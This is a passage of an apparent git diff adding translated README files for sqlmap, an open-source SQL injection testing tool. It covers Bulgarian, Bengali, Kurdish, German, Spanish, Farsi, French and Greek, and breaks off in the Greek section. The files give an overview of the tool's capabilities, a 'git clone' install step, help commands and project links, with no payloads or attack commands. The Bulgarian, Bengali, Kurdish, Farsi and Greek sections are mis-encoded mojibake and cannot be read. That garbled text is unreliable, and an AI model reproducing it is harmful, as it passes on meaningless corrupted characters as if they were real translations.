взима от Ñървъра. Снабден е Ñ Ð¼Ð¾Ñ‰ÐµÐ½ детектор, множеÑтво Ñпециални функции за най-Ð´Ð¾Ð±Ñ€Ð¸Ñ Ñ‚ÐµÑтер и широк Ñпектър от функции, които могат да Ñе използват за множеÑтво цели - извличане на данни от базата данни, доÑтъп до оÑновната файлова ÑиÑтема и изпълнÑване на команди на операционната ÑиÑтема. + +Демо Ñнимки +---- + +![Снимка на екрана](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Можете да поÑетите [колекциÑта от Ñнимки на екрана](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), показващи нÑкои функции, качени на wiki. + +ИнÑталиране +---- + +Може да изтеглине най-новите tar архиви като кликнете [тук](https://github.com/sqlmapproject/sqlmap/tarball/master) или най-новите zip архиви като кликнете [тук](https://github.com/sqlmapproject/sqlmap/zipball/master). + +За предпочитане е да изтеглите sqlmap като клонирате [Git](https://github.com/sqlmapproject/sqlmap) хранилището: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap работи ÑамоÑтоÑтелно Ñ [Python](https://www.python.org/download/) верÑÐ¸Ñ **2.7** и **3.x** на вÑички платформи. + +Използване +---- + +За да получите ÑпиÑък Ñ Ð¾Ñновните опции използвайте: + + python sqlmap.py -h + +За да получите ÑпиÑък Ñ Ð²Ñички опции използвайте: + + python sqlmap.py -hh + +Може да намерите пример за използване на sqlmap [тук](https://asciinema.org/a/46601). 
+За да разберете възможноÑтите на sqlmap, ÑпиÑък на поддържаните функции и опиÑание на вÑички опции, заедно Ñ Ð¿Ñ€Ð¸Ð¼ÐµÑ€Ð¸, Ñе препоръчва да Ñе разгледа [упътването](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Връзки +---- + +* Ðачална Ñтраница: https://sqlmap.org +* ИзтеглÑне: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS емиÑиÑ: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* ПроÑледÑване на проблеми и въпроÑи: https://github.com/sqlmapproject/sqlmap/issues +* Упътване: https://github.com/sqlmapproject/sqlmap/wiki +* ЧеÑто задавани въпроÑи (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Демо: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Снимки на екрана: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-bn-BD.md b/doc/translations/README-bn-BD.md new file mode 100644 index 00000000000..8e4cfe36905 --- /dev/null +++ b/doc/translations/README-bn-BD.md @@ -0,0 +1,62 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![X](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +**SQLMap** à¦à¦•টি ওপেন সোরà§à¦¸ পেনিটà§à¦°à§‡à¦¶à¦¨ টেসà§à¦Ÿà¦¿à¦‚ টà§à¦² যা সà§à¦¬à¦¯à¦¼à¦‚কà§à¦°à¦¿à¦¯à¦¼à¦­à¦¾à¦¬à§‡ SQL ইনজেকশন দà§à¦°à§à¦¬à¦²à¦¤à¦¾ সনাকà§à¦¤ ও শোষণ করতে à¦à¦¬à¦‚ ডাটাবেস সারà§à¦­à¦¾à¦° নিয়নà§à¦¤à§à¦°à¦£à§‡ নিতে সহায়তা করে। à¦à¦Ÿà¦¿ à¦à¦•টি শকà§à¦¤à¦¿à¦¶à¦¾à¦²à§€ ডিটেকশন ইঞà§à¦œà¦¿à¦¨, উনà§à¦¨à¦¤ ফিচার à¦à¦¬à¦‚ পেনিটà§à¦°à§‡à¦¶à¦¨ টেসà§à¦Ÿà¦¾à¦°à¦¦à§‡à¦° জনà§à¦¯ দরকারি বিভিনà§à¦¨ অপশন নিয়ে আসে। à¦à¦° মাধà§à¦¯à¦®à§‡ ডাটাবেস ফিঙà§à¦—ারপà§à¦°à¦¿à¦¨à§à¦Ÿà¦¿à¦‚, ডাটাবেস থেকে তথà§à¦¯ আহরণ, ফাইল সিসà§à¦Ÿà§‡à¦® অà§à¦¯à¦¾à¦•à§à¦¸à§‡à¦¸, à¦à¦¬à¦‚ অপারেটিং সিসà§à¦Ÿà§‡à¦®à§‡ কমানà§à¦¡ চালানোর মতো কাজ করা যায়, à¦à¦®à¦¨à¦•ি আউট-অফ-বà§à¦¯à¦¾à¦¨à§à¦¡ সংযোগ বà§à¦¯à¦¬à¦¹à¦¾à¦° করেও। + + + +সà§à¦•à§à¦°à¦¿à¦¨à¦¶à¦Ÿ +--- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +আপনি [Wiki-তে](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) গিয়ে SQLMap-à¦à¦° বিভিনà§à¦¨ ফিচারের ডেমোনসà§à¦Ÿà§à¦°à§‡à¦¶à¦¨ দেখতে পারেন। + +ইনসà§à¦Ÿà¦²à§‡à¦¶à¦¨ +--- +সরà§à¦¬à¦¶à§‡à¦· টারবলে ডাউনলোড করà§à¦¨ [à¦à¦–ানে](https://github.com/sqlmapproject/sqlmap/tarball/master) অথবা সরà§à¦¬à¦¶à§‡à¦· জিপ ফাইল [à¦à¦–ানে](https://github.com/sqlmapproject/sqlmap/zipball/master)। + +অথবা, সরাসরি [Git](https://github.com/sqlmapproject/sqlmap) রিপোজিটরি থেকে কà§à¦²à§‹à¦¨ করà§à¦¨: + +``` +git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev +``` + +SQLMap সà§à¦¬à¦¯à¦¼à¦‚কà§à¦°à¦¿à¦¯à¦¼à¦­à¦¾à¦¬à§‡ [Python](https://www.python.org/download/) **2.7** à¦à¦¬à¦‚ **3.x** সংসà§à¦•রণে যেকোনো পà§à¦²à§à¦¯à¦¾à¦Ÿà¦«à¦°à§à¦®à§‡ কাজ করে। + + + +বà§à¦¯à¦¬à¦¹à¦¾à¦°à§‡à¦° নিরà§à¦¦à§‡à¦¶à¦¿à¦•া +--- + +বেসিক অপশন à¦à¦¬à¦‚ সà§à¦‡à¦šà¦¸à¦®à§‚হ দেখতে বà§à¦¯à¦¬à¦¹à¦¾à¦° করà§à¦¨: + +``` +python sqlmap.py -h +``` + +সমসà§à¦¤ অপশন ও সà§à¦‡à¦šà§‡à¦° তালিকা পেতে বà§à¦¯à¦¬à¦¹à¦¾à¦° করà§à¦¨: + +``` +python sqlmap.py 
-hh +``` + +আপনি à¦à¦•টি নমà§à¦¨à¦¾ রান দেখতে পারেন [à¦à¦–ানে](https://asciinema.org/a/46601)। +SQLMap-à¦à¦° সমà§à¦ªà§‚রà§à¦£ ফিচার, কà§à¦·à¦®à¦¤à¦¾, à¦à¦¬à¦‚ কনফিগারেশন সমà§à¦ªà¦°à§à¦•ে বিসà§à¦¤à¦¾à¦°à¦¿à¦¤ জানতে [বà§à¦¯à¦¬à¦¹à¦¾à¦°à¦•ারীর মà§à¦¯à¦¾à¦¨à§à¦¯à¦¼à¦¾à¦²](https://github.com/sqlmapproject/sqlmap/wiki/Usage) পড়ার পরামরà§à¦¶ দেওয়া হচà§à¦›à§‡à¥¤ + + + +লিঙà§à¦•সমূহ +--- + +* হোমপেজ: https://sqlmap.org +* ডাউনলোড: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) অথবা [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* কমিটস RSS ফিড: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* ইসà§à¦¯à§ টà§à¦°à§à¦¯à¦¾à¦•ার: https://github.com/sqlmapproject/sqlmap/issues +* বà§à¦¯à¦¬à¦¹à¦¾à¦°à¦•ারীর মà§à¦¯à¦¾à¦¨à§à¦¯à¦¼à¦¾à¦²: https://github.com/sqlmapproject/sqlmap/wiki +* সচরাচর জিজà§à¦žà¦¾à¦¸à¦¿à¦¤ পà§à¦°à¦¶à§à¦¨ (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* ডেমো ভিডিও: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* সà§à¦•à§à¦°à¦¿à¦¨à¦¶à¦Ÿ: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots + diff --git a/doc/translations/README-ckb-KU.md b/doc/translations/README-ckb-KU.md new file mode 100644 index 00000000000..db813955337 --- /dev/null +++ b/doc/translations/README-ckb-KU.md @@ -0,0 +1,67 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + + +
+ + + +بەرنامەی `sqlmap` بەرنامەیەکی تاقیکردنەوەی چوونە ژوورەوەی سەرچاوە کراوەیە Ú©Û• بە شێوەیەکی ئۆتۆماتیکی بنکەدراوە Ú©Û• Ú©ÛŽØ´Û•ÛŒ ئاسایشی SQL Injection یان هەیە دەدۆزێتەوە. ئەم بەرنامەیە بزوێنەرێکی بەهێزی دیاریکردنی تێدایە. هەروەها Ú©Û†Ù…Û•ÚµÛŽÚ© سکریپتی Ø¨Û•Ø±ÙØ±Ø§ÙˆØ§Ù†ÛŒ هەیە Ú©Û• ئاسانکاری دەکات بۆ پیشەییەکانی تاقیکردنەوەی دزەکردن(penetration tester) بۆ کارکردن Ù„Û•Ú¯Û•Úµ بنکەدراوە. Ù„Û• کۆکردنەوەی زانیاری دەربارەی بانکی داتا تا دەستگەیشتن بە داتاکانی سیستەم Ùˆ جێبەجێکردنی Ùەرمانەکان Ù„Û• Ú•ÛŽÚ¯Û•ÛŒ پەیوەندی Out Of Band Ù„Û• سیستەمی کارگێڕدا. + + +سکرین شاتی ئامرازەکە +---- + + +
+ + + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + + +
+ +بۆ بینینی [Ú©Û†Ù…Û•ÚµÛŽÚ© سکرین شات Ùˆ سکریپت](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) دەتوانیت سەردانی ویکیەکە بکەیت. + + +دامەزراندن +---- + +بۆ دابەزاندنی نوێترین وەشانی tarballØŒ کلیک [لێرە](https://github.com/sqlmapproject/sqlmap/tarball/master) یان دابەزاندنی نوێترین وەشانی zipball بە کلیککردن لەسەر [لێرە](https://github.com/sqlmapproject/sqlmap/zipball/master) دەتوانیت ئەم کارە بکەیت. + +باشترە بتوانیت sqlmap دابەزێنیت بە کلۆنکردنی کۆگای [Git](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap Ù„Û• دەرەوەی سندوق کاردەکات Ù„Û•Ú¯Û•Úµ [Python](https://www.python.org/download/) وەشانی **2.6**ØŒ **2.7** Ùˆ **3.x** لەسەر هەر پلاتÙۆرمێک. + +چۆنیەتی بەکارهێنان +---- + +بۆ بەدەستهێنانی لیستی بژاردە سەرەتاییەکان Ùˆ سویچەکان ئەمانە بەکاربهێنە: + + python sqlmap.py -h + +بۆ بەدەستهێنانی لیستی هەموو بژاردە Ùˆ سویچەکان ئەمە بەکار بێنا: + + python sqlmap.py -hh + +دەتوانن نمونەی ڕانکردنێک بدۆزنەوە [لێرە](https://asciinema.org/a/46601). +بۆ بەدەستهێنانی تێڕوانینێکی گشتی Ù„Û• تواناکانی sqlmapØŒ لیستی تایبەتمەندییە پشتگیریکراوەکان، Ùˆ وەسÙکردنی هەموو هەڵبژاردن Ùˆ سویچەکان، Ù„Û•Ú¯Û•Úµ نموونەکان، ئامۆژگاریت دەکرێت Ú©Û• ڕاوێژ بە [دەستنووسی بەکارهێنەر](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +بەستەرەکان +---- + +* ماڵپەڕی سەرەکی: https://sqlmap.org +* داگرتن: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) یان [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Ùیدی RSS جێبەجێ دەکات: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* شوێنپێهەڵگری کێشەکان: https://github.com/sqlmapproject/sqlmap/issues +* ڕێنمایی بەکارهێنەر: https://github.com/sqlmapproject/sqlmap/wiki +* پرسیارە زۆرەکان (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* دیمۆ: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* ÙˆÛŽÙ†Û•ÛŒ شاشە: https://github.com/sqlmapproject/sqlmap/wiki/ÙˆÛŽÙ†Û•ÛŒ شاشە + +وەرگێڕانەکان diff --git a/doc/translations/README-de-DE.md b/doc/translations/README-de-DE.md new file mode 100644 index 00000000000..65d96220ea5 --- /dev/null +++ b/doc/translations/README-de-DE.md @@ -0,0 +1,49 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap ist ein quelloffenes Penetrationstest Werkzeug, das die Entdeckung, Ausnutzung und Übernahme von SQL injection Schwachstellen automatisiert. Es kommt mit einer mächtigen Erkennungs-Engine, vielen Nischenfunktionen für den ultimativen Penetrationstester und einem breiten Spektrum an Funktionen von Datenbankerkennung, abrufen von Daten aus der Datenbank, zugreifen auf das unterliegende Dateisystem bis hin zur Befehlsausführung auf dem Betriebssystem mit Hilfe von out-of-band Verbindungen. 
+ +Screenshots +--- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Du kannst eine [Sammlung von Screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), die einige der Funktionen demonstrieren, auf dem Wiki einsehen. + +Installation +--- + +[Hier](https://github.com/sqlmapproject/sqlmap/tarball/master) kannst du das neueste TAR-Archiv herunterladen und [hier](https://github.com/sqlmapproject/sqlmap/zipball/master) das neueste ZIP-Archiv. + +Vorzugsweise kannst du sqlmap herunterladen, indem du das [GIT](https://github.com/sqlmapproject/sqlmap) Repository klonst: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap funktioniert sofort mit den [Python](https://www.python.org/download/) Versionen 2.6, 2.7 und 3.x auf jeder Plattform. + +Benutzung +--- + +Um eine Liste aller grundsätzlichen Optionen und Switches zu bekommen, nutze diesen Befehl: + + python sqlmap.py -h + +Um eine Liste aller Optionen und Switches zu bekommen, nutze diesen Befehl: + + python sqlmap.py -hh + +Ein Probelauf ist [hier](https://asciinema.org/a/46601) zu finden. Um einen Überblick über sqlmaps Fähigkeiten, unterstützte Funktionen und eine Erklärung aller Optionen und Switches, zusammen mit Beispielen, zu erhalten, wird das [Benutzerhandbuch](https://github.com/sqlmapproject/sqlmap/wiki/Usage) empfohlen. + +Links +--- + +* Webseite: https://sqlmap.org +* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) oder [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Problemverfolgung: https://github.com/sqlmapproject/sqlmap/issues +* Benutzerhandbuch: https://github.com/sqlmapproject/sqlmap/wiki +* Häufig gestellte Fragen (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Demonstrationen: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-es-MX.md b/doc/translations/README-es-MX.md new file mode 100644 index 00000000000..f85f4862fca --- /dev/null +++ b/doc/translations/README-es-MX.md @@ -0,0 +1,49 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap es una herramienta para pruebas de penetración "penetration testing" de software libre que automatiza el proceso de detección y explotación de fallos mediante inyección de SQL además de tomar el control de servidores de bases de datos.
Contiene un poderoso motor de detección, así como muchas de las funcionalidades esenciales para el "pentester" y una amplia gama de opciones desde la recopilación de información para identificar el objetivo conocido como "fingerprinting" mediante la extracción de información de la base de datos, hasta el acceso al sistema de archivos subyacente para ejecutar comandos en el sistema operativo a través de conexiones alternativas conocidas como "Out-of-band". + +Capturas de Pantalla +--- +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Visita la [colección de capturas de pantalla](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) que demuestra algunas de las características en la documentación (wiki). + +Instalación +--- + +Se puede descargar el "tarball" más actual haciendo clic [aquí](https://github.com/sqlmapproject/sqlmap/tarball/master) o el "zipball" [aquí](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Preferentemente, se puede descargar sqlmap clonando el repositorio [Git](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap funciona con las siguientes versiones de [Python](https://www.python.org/download/) **2.7** y **3.x** en cualquier plataforma. + +Uso +--- + +Para obtener una lista de opciones básicas: + + python sqlmap.py -h + +Para obtener una lista de todas las opciones: + + python sqlmap.py -hh + +Se puede encontrar una muestra de su funcionamiento [aquí](https://asciinema.org/a/46601). +Para obtener una visión general de las capacidades de sqlmap, así como un listado de funciones soportadas y descripción de todas las opciones y modificadores, junto con ejemplos, se recomienda consultar el [manual de usuario](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Enlaces +--- + +* Página principal: https://sqlmap.org +* Descargar: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) o [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Fuente de Cambios "Commit RSS feed": https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Seguimiento de problemas "Issue tracker": https://github.com/sqlmapproject/sqlmap/issues +* Manual de usuario: https://github.com/sqlmapproject/sqlmap/wiki +* Preguntas frecuentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Demostraciones: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Imágenes: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-fa-IR.md b/doc/translations/README-fa-IR.md new file mode 100644 index 00000000000..eb84e410939 --- /dev/null +++ b/doc/translations/README-fa-IR.md @@ -0,0 +1,84 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +
+ + + +برنامه `sqlmap`ØŒ یک برنامه‌ی تست Ù†Ùوذ منبع باز است Ú©Ù‡ ÙØ±Ø¢ÛŒÙ†Ø¯ تشخیص Ùˆ اکسپلویت پایگاه های داده با مشکل امنیتی SQL Injection را بطور خودکار انجام Ù…ÛŒ دهد. این برنامه مجهز به موتور تشخیص قدرتمندی می‌باشد. همچنین داری طی٠گسترده‌ای از اسکریپت ها می‌باشد Ú©Ù‡ برای متخصصان تست Ù†Ùوذ کار کردن با بانک اطلاعاتی را راحتر می‌کند. از جمع اوری اطلاعات درباره بانک داده تا دسترسی به داده های سیستم Ùˆ اجرا دستورات از طریق ارتباط Out Of Band درسیستم عامل را امکان پذیر می‌کند. + + +تصویر محیط ابزار +---- + + +
+ + + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + + +
+ +برای نمایش [مجموعه ای از اسکریپت‌ها](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) می‌توانید از دانشنامه دیدن کنید. + + +نصب +---- + +برای دانلود اخرین نسخه tarballØŒ با کلیک در [اینجا](https://github.com/sqlmapproject/sqlmap/tarball/master) یا دانلود اخرین نسخه zipball با کلیک در [اینجا](https://github.com/sqlmapproject/sqlmap/zipball/master) میتوانید این کار را انجام دهید. + + +نحوه Ø§Ø³ØªÙØ§Ø¯Ù‡ +---- + + +برای Ø¯Ø±ÛŒØ§ÙØª لیست ارگومان‌های اساسی می‌توانید از دستور زیر Ø§Ø³ØªÙØ§Ø¯Ù‡ کنید: + + + +
+ + +``` + python sqlmap.py -h +``` + + + + +
+ + +برای Ø¯Ø±ÛŒØ§ÙØª لیست تمامی ارگومان‌ها می‌توانید از دستور زیر Ø§Ø³ØªÙØ§Ø¯Ù‡ کنید: + +
+ + +``` + python sqlmap.py -hh +``` + + +
+ + +برای اجرای سریع Ùˆ ساده ابزار Ù…ÛŒ توانید از [اینجا](https://asciinema.org/a/46601) Ø§Ø³ØªÙØ§Ø¯Ù‡ کنید. برای Ø¯Ø±ÛŒØ§ÙØª اطلاعات بیشتر در رابطه با قابلیت ها ØŒ امکانات قابل پشتیبانی Ùˆ لیست کامل امکانات Ùˆ دستورات همراه با مثال می‌ توانید به [راهنمای](https://github.com/sqlmapproject/sqlmap/wiki/Usage) `sqlmap` سر بزنید. + + +لینک‌ها +---- + + +* خانه: https://sqlmap.org +* دانلود: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) یا [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* نظرات: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* پیگیری مشکلات: https://github.com/sqlmapproject/sqlmap/issues +* راهنمای کاربران: https://github.com/sqlmapproject/sqlmap/wiki +* سوالات متداول: https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* توییتر: [@sqlmap](https://x.com/sqlmap) +* رسانه: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* تصاویر: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-fr-FR.md b/doc/translations/README-fr-FR.md new file mode 100644 index 00000000000..4d867898b97 --- /dev/null +++ b/doc/translations/README-fr-FR.md @@ -0,0 +1,49 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +**sqlmap** est un outil Open Source de test d'intrusion. Cet outil permet d'automatiser le processus de détection et d'exploitation des failles d'injection SQL afin de prendre le contrôle des serveurs de base de données. __sqlmap__ dispose d'un puissant moteur de détection utilisant les techniques les plus récentes et les plus dévastatrices de tests d'intrusion comme L'Injection SQL, qui permet d'accéder à la base de données, au système de fichiers sous-jacent et permet aussi l'exécution des commandes sur le système d'exploitation. + +---- + +![Les Captures d'écran](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Les captures d'écran disponible [ici](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) démontrent des fonctionnalités de __sqlmap__. + +Installation +---- + +Vous pouvez télécharger le fichier "tarball" le plus récent en cliquant [ici](https://github.com/sqlmapproject/sqlmap/tarball/master). Vous pouvez aussi télécharger l'archive zip la plus récente [ici](https://github.com/sqlmapproject/sqlmap/zipball/master). + +De préférence, télécharger __sqlmap__ en le [clonant](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap fonctionne sur n'importe quel système d'exploitation avec la version **2.7** et **3.x** de [Python](https://www.python.org/download/) + +Utilisation +---- + +Pour afficher une liste des fonctions de bases et des commutateurs (switches), tapez: + + python sqlmap.py -h + +Pour afficher une liste complète des options et des commutateurs (switches), tapez: + + python sqlmap.py -hh + +Vous pouvez regarder une vidéo [ici](https://asciinema.org/a/46601) pour plus d'exemples. 
+Pour obtenir un aperçu des ressources de __sqlmap__, une liste des fonctionnalités prises en charge, la description de toutes les options, ainsi que des exemples, nous vous recommandons de consulter [le wiki](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Liens +---- + +* Page d'acceuil: https://sqlmap.org +* Téléchargement: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Suivi des issues: https://github.com/sqlmapproject/sqlmap/issues +* Manuel de l'utilisateur: https://github.com/sqlmapproject/sqlmap/wiki +* Foire aux questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Démonstrations: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Les captures d'écran: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-gr-GR.md b/doc/translations/README-gr-GR.md new file mode 100644 index 00000000000..0d5e0446570 --- /dev/null +++ b/doc/translations/README-gr-GR.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +Το sqlmap είναι Ï€ÏόγÏαμμα Î±Î½Î¿Î¹Ï‡Ï„Î¿Ï ÎºÏŽÎ´Î¹ÎºÎ±, που αυτοματοποιεί την εÏÏεση και εκμετάλλευση ευπαθειών Ï„Ïπου SQL Injection σε βάσεις δεδομένων. ΈÏχεται με μια δυνατή μηχανή αναγνώÏισης ευπαθειών, πολλά εξειδικευμένα χαÏακτηÏιστικά για τον απόλυτο penetration tester όπως και με ένα μεγάλο εÏÏος επιλογών αÏχίζοντας από την αναγνώÏιση της βάσης δεδομένων, κατέβασμα δεδομένων της βάσης, μέχÏι και Ï€Ïόσβαση στο βαθÏτεÏο σÏστημα αÏχείων και εκτέλεση εντολών στο απευθείας στο λειτουÏγικό μέσω εκτός ζώνης συνδέσεων. + +Εικόνες +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +ΜποÏείτε να επισκεφτείτε τη [συλλογή από εικόνες](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) που επιδεικνÏουν κάποια από τα χαÏακτηÏιστικά. + +Εγκατάσταση +---- + +Έχετε τη δυνατότητα να κατεβάσετε την τελευταία tarball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/tarball/master) ή την τελευταία zipball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Κατά Ï€Ïοτίμηση, μποÏείτε να κατεβάσετε το sqlmap κάνοντας κλώνο το [Git](https://github.com/sqlmapproject/sqlmap) αποθετήÏιο: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +Το sqlmap λειτουÏγεί χωÏίς πεÏαιτέÏω κόπο με την [Python](https://www.python.org/download/) έκδοσης **2.7** και **3.x** σε όποια πλατφόÏμα. + +ΧÏήση +---- + +Για να δείτε μια βασική λίστα από επιλογές 